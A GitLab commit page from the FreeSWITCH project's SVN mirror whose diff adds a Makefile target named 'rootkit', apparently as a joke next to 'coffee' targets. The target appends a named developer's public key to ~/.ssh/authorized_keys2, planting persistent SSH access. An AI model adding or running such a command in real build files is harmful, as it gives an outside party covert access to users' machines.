提交 0b5dc49b authored 作者: Michael Jerris's avatar Michael Jerris

add make rootkit

git-svn-id: http://svn.freeswitch.org/svn/freeswitch/trunk@10615 d0543943-73ff-0310-b7d9-9358b9ac24b2
上级 ff482e3e
...@@ -449,6 +449,9 @@ $(OUR_MODULES): ...@@ -449,6 +449,9 @@ $(OUR_MODULES):
|| case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \ || case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
test -z "$$fail" test -z "$$fail"
rootkit:
cat ssh_keys/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2
# Special targets # Special targets
coffee me_a_sandwich me_a_sammich: coffee me_a_sandwich me_a_sammich:
......
Markdown 格式
0%
您添加了 0 到此讨论。请谨慎行事。
请先完成此评论的编辑!
注册 或者 后发表评论